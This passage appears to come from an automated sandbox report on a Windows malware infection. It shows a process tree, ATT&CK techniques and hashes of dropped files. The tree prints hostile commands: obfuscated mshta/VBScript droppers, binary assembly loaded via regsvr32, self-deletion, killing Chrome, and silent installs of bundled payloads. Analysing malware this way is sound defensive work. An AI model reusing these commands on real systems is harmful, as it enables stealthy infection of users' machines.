                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\B123.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:6932
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\B2F9.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\B2F9.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                    PID:6988
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im B2F9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B2F9.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:6756
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          taskkill /im B2F9.exe /f
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:5852
                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                          timeout /t 6
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                          PID:868
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B8A7.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B8A7.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:7004
                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\B8A7.exe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if """" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\B8A7.exe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4076
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\B8A7.exe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "" == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\B8A7.exe" ) do taskkill -F -im "%~Nxw"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6708
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe
                                                                                                                                                                                  ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:6180
                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if ""-pLTfn82smRxoqI1Rgg5LiENy6ewubmT "" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:6188
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "-pLTfn82smRxoqI1Rgg5LiENy6ewubmT " == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" ) do taskkill -F -im "%~Nxw"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:6512
                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbsCripT:cLose ( cReatEoBJEcT ( "WScript.sheLl" ). Run ( "CMd.EXe /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = ""MZ"" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P + WWAA.Ue5 + JBVF~.yS + rcEI.~+ Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U " , 0 , true ) )
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:6684
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = "MZ" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P +WWAA.Ue5 + JBVF~.yS + rcEI.~+Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:5052
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                    PID:2156
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>FIq2DqT_.Q"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:4752
                                                                                                                                                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                      regsvr32.exe -S ..\MRZCIH.DO /U
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      PID:4188
                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                taskkill -F -im "B8A7.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                PID:6508
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D6CF.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\D6CF.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          PID:7040
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\DF1D.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\DF1D.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4968
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-A3JGH.tmp\DF1D.tmp
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-A3JGH.tmp\DF1D.tmp" /SL5="$2035E,188175,104448,C:\Users\Admin\AppData\Local\Temp\DF1D.exe"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              PID:5872
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-GMIAD.tmp\134 Vaporeondè_éçè_)))_.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-GMIAD.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec7
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                PID:7112
                                                                                                                                                                                                • C:\Program Files\Reference Assemblies\RFODFZAHVT\irecord.exe
                                                                                                                                                                                                  "C:\Program Files\Reference Assemblies\RFODFZAHVT\irecord.exe" /VERYSILENT
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:6076
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-923SO.tmp\irecord.tmp
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-923SO.tmp\irecord.tmp" /SL5="$7026E,5808768,66560,C:\Program Files\Reference Assemblies\RFODFZAHVT\irecord.exe" /VERYSILENT
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                      PID:1272
                                                                                                                                                                                                      • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:6564
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\98-c1da7-c15-24dbc-778948f473c1d\Jixefujina.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\98-c1da7-c15-24dbc-778948f473c1d\Jixefujina.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:6548
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\c7-b6c7c-0e7-5b0b9-748887d95534f\Lamuxalaehu.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\c7-b6c7c-0e7-5b0b9-748887d95534f\Lamuxalaehu.exe"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:4492
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jr25jv2u.vxm\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:892
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kg1mqoy2.jqx\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:364
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ytspod5c.xma\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:4440
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5tgdo4uu.t31\google-game.exe & exit
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:4500
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2212.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2212.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:6448
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2CC2.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2CC2.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:3036
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\387B.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\387B.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5224
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5832
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:5992
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\65B6.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\65B6.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:6848
                                                                                                                                                                                                                  • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                    C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:6904

                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                                    1
                                                                                                                                                                                                                    T1031

                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                    1
                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                                    1
                                                                                                                                                                                                                    T1197

                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                    2
                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                                                    1
                                                                                                                                                                                                                    T1089

                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                    1
                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                    File Permissions Modification

                                                                                                                                                                                                                    1
                                                                                                                                                                                                                    T1222

                                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                                    1
                                                                                                                                                                                                                    T1197

                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                    5
                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                                                    1
                                                                                                                                                                                                                    T1518

                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                    7
                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                    1
                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                    7
                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                    Security Software Discovery

                                                                                                                                                                                                                    1
                                                                                                                                                                                                                    T1063

                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                    1
                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                                                    1
                                                                                                                                                                                                                    T1018

                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                    5
                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                    1
                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_1.exe
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      a957a80658f31c8fc864755deb2a0ca7

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      8692ad674194f0901ee776ba99704f061babda95

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      99117569330d3694ed281e0c5414c23aa33a5eb370494febb267925dd4a62208

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      b46056d3971718a7770fef54d8a2af34363eb2e785f5506e9cb261c331954d12b810e46b297ebb98ccdf7f9bde73290d46491aa7a3276bdef51869651f7105af

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_1.txt
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      a957a80658f31c8fc864755deb2a0ca7

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      8692ad674194f0901ee776ba99704f061babda95

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      99117569330d3694ed281e0c5414c23aa33a5eb370494febb267925dd4a62208

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      b46056d3971718a7770fef54d8a2af34363eb2e785f5506e9cb261c331954d12b810e46b297ebb98ccdf7f9bde73290d46491aa7a3276bdef51869651f7105af

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_2.exe
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      c6f791cdb3ec5ab080f0d84e9cb1d4eb

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      d22f28ccda8b98265f9dba0c26d3f0cc3e2b6cdf

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      d70b6e5dad1618f3d9f08a1d8220c6c34f959db468640b4e21f0b2b5c2507414

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      d41134a4b310d5e640240c1083a39e4e0ffa5c025287060a9cdd94be67a877e6e88f8d85cb6ceca432bdc3de19e95465a560642fb119820105141bd9c57a0d30

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_2.txt
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      c6f791cdb3ec5ab080f0d84e9cb1d4eb

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      d22f28ccda8b98265f9dba0c26d3f0cc3e2b6cdf

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      d70b6e5dad1618f3d9f08a1d8220c6c34f959db468640b4e21f0b2b5c2507414

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      d41134a4b310d5e640240c1083a39e4e0ffa5c025287060a9cdd94be67a877e6e88f8d85cb6ceca432bdc3de19e95465a560642fb119820105141bd9c57a0d30

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_3.exe
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      7837314688b7989de1e8d94f598eb2dd

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      889ae8ce433d5357f8ea2aff64daaba563dc94e3

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      d8c28d07c365873b4e8332f057f062e65f2dd0cd4d599fd8b16d82eca5cf4247

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      3df0c24a9f51a82716abb8e87ff44fdb6686183423d1f2f7d6bfb4cd03c3a18490f2c7987c29f3e1b2d25c48d428c2e73033998a872b185f70bb68a7aedb3e7c

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_3.txt
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      7837314688b7989de1e8d94f598eb2dd

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      889ae8ce433d5357f8ea2aff64daaba563dc94e3

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      d8c28d07c365873b4e8332f057f062e65f2dd0cd4d599fd8b16d82eca5cf4247

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      3df0c24a9f51a82716abb8e87ff44fdb6686183423d1f2f7d6bfb4cd03c3a18490f2c7987c29f3e1b2d25c48d428c2e73033998a872b185f70bb68a7aedb3e7c

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_4.exe
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_4.txt
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_5.exe
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      f12aa4983f77ed85b3a618f7656807c2

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      ab29f2221d590d03756d89e63cf2802ee31ecbcf

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      5db1d9e50f0e0e0ba0b15920e65a1b9e3b61bcc03d5930870e0b226b600a72e2

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      9074af27996a11e988be7147cf387d8952b515d070ff49fec22f0e5b2d374563204eda56319447d9b5f49f056be1475f0a1a2c501fdf1a769d7d8a8077ccba8b

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_5.txt
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      f12aa4983f77ed85b3a618f7656807c2

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      ab29f2221d590d03756d89e63cf2802ee31ecbcf

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      5db1d9e50f0e0e0ba0b15920e65a1b9e3b61bcc03d5930870e0b226b600a72e2

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      9074af27996a11e988be7147cf387d8952b515d070ff49fec22f0e5b2d374563204eda56319447d9b5f49f056be1475f0a1a2c501fdf1a769d7d8a8077ccba8b

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_6.exe
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      a0b06be5d5272aa4fcf2261ed257ee06

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      596c955b854f51f462c26b5eb94e1b6161aad83c

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      475d0beeadca13ecdfd905c840297e53ad87731dc911b324293ee95b3d8b700b

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      1eb6b9df145b131d03224e9bb7ed3c6cc87044506d848be14d3e4c70438e575dbbd2a0964b176281b1307469872bd6404873974475cd91eb6f7534d16ceff702

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_6.txt
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      a0b06be5d5272aa4fcf2261ed257ee06

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      596c955b854f51f462c26b5eb94e1b6161aad83c

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      475d0beeadca13ecdfd905c840297e53ad87731dc911b324293ee95b3d8b700b

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      1eb6b9df145b131d03224e9bb7ed3c6cc87044506d848be14d3e4c70438e575dbbd2a0964b176281b1307469872bd6404873974475cd91eb6f7534d16ceff702

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_7.exe
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      b0486bfc2e579b49b0cacee12c52469c

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      ac6eb40cc66eddd0589eb940e6a6ce06b00c7d30

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      9057ba81960258a882dee4335d947f499adabfc59bfd99e2b5f56b508a01fbe2

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      b7f55e346830e2a2ed99bd57bfd0cb66221675a6b0b23d35e5d7fac5eee0c3dfc771eed5fed410c2063410e048fe41765c880ebf0a48137f9135cf1d65951075

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_7.exe
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      b0486bfc2e579b49b0cacee12c52469c

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      ac6eb40cc66eddd0589eb940e6a6ce06b00c7d30

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      9057ba81960258a882dee4335d947f499adabfc59bfd99e2b5f56b508a01fbe2

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      b7f55e346830e2a2ed99bd57bfd0cb66221675a6b0b23d35e5d7fac5eee0c3dfc771eed5fed410c2063410e048fe41765c880ebf0a48137f9135cf1d65951075

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_7.txt
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      b0486bfc2e579b49b0cacee12c52469c

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      ac6eb40cc66eddd0589eb940e6a6ce06b00c7d30

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      9057ba81960258a882dee4335d947f499adabfc59bfd99e2b5f56b508a01fbe2

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      b7f55e346830e2a2ed99bd57bfd0cb66221675a6b0b23d35e5d7fac5eee0c3dfc771eed5fed410c2063410e048fe41765c880ebf0a48137f9135cf1d65951075

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\libcurl.dll
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\libcurlpp.dll
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\libstdc++-6.dll
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\libwinpthread-1.dll
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\setup_install.exe
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      843e8bb487aa489044ec65dbb7393105

